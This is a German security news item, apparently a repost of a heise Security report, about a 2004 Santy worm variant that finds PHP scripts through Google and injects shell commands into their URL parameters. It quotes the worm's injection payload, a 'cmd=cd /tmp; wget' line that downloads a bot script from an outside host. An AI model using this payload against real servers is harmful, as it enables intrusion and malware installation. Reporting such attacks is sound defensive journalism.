Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Say thank you!
You like the article and want to thank the author? Send him an amount of your choice.
Say thanks!
Ratings
Here you can write a comment
Related topics
IBM entwickelt "schnellsten Prozessor der Welt"
Der neue Siliziumprozessor erreiche eine Geschwindigkeit von 210 Gigahertz. Damit sei eine magische Grenze durchbrochen. Genau wie man früher geglaubt habe, dass Flugzeuge nie die Schallmauer durchbrechen könnten, sei man bisher überzeugt gewesen, dass Si ...
Autor :
admin
Category:
Software & Web-Development
Webbrowser Netscape 7.02 freigegeben
Die AOL-Tochter hat die neue Version 7.02 ihres Browsers bereitgestellt. Laut den Release Notes bringt Netscape 7.02 neben neuen Flash- und Java-Plug-ins nur "verbesserte Sicherheit und Stabilität" -- neue Funktionen sind Mangelware. Ein Download steht ...
Autor :
admin
Category:
Software & Web-Development
Interaktiver Workshop am 9.Juli in Köln
In Zusammenarbeit mit Microsoft veranstaltet multimediatreff.de einen interaktiven Workshop zum Thema "Webanwendungen sicher programmieren" - dabei gilt es den Webshop der 3 Referenten (Christian Wenz, Karsten Samschke und Uwe Baumann) zu knacken - alles ...
Autor :
admin
Category:
Software & Web-Development
Commission Junction (cj) jetzt in Deutschland
Bis zu 1000 Euro monatlich zusätzlich für jeden aktiven Partner. Das internationale Partnerprogramm-Netzwerk Commission Junction (CJ) startet in Deutschland mit großem Investment in seine Publisher. Jeder Publisher erhält bis zum 30. Juni 2005 zusätzlich ...
Autor :
admin
Category:
Software & Web-Development
Wrapper für Bing Search API (inkl. PHP Beispiele)
Mit dem Wrapper ist es möglich, die Bing-Suchergebnisse auf seiner eigenen Webseite darzustellen. ...
Autor :
admin
Category:
Miscellaneous
PremiumSoft veröffentlicht MySQL Studio version 4.4
PremiumSoft veröffentlicht MySQL Studio version 4.4 Grafische Oberfläche für Ihre MYSQL Datenbank Mit dem PremiumSoft MySQL Studio ist eine grafische Oberfläche für Ihre MYSQL Datenbank. Dieses Tool ermöglicht es Reports auf einfache Art und Weise z ...
Autor :
admin
Category:
Software & Web-Development
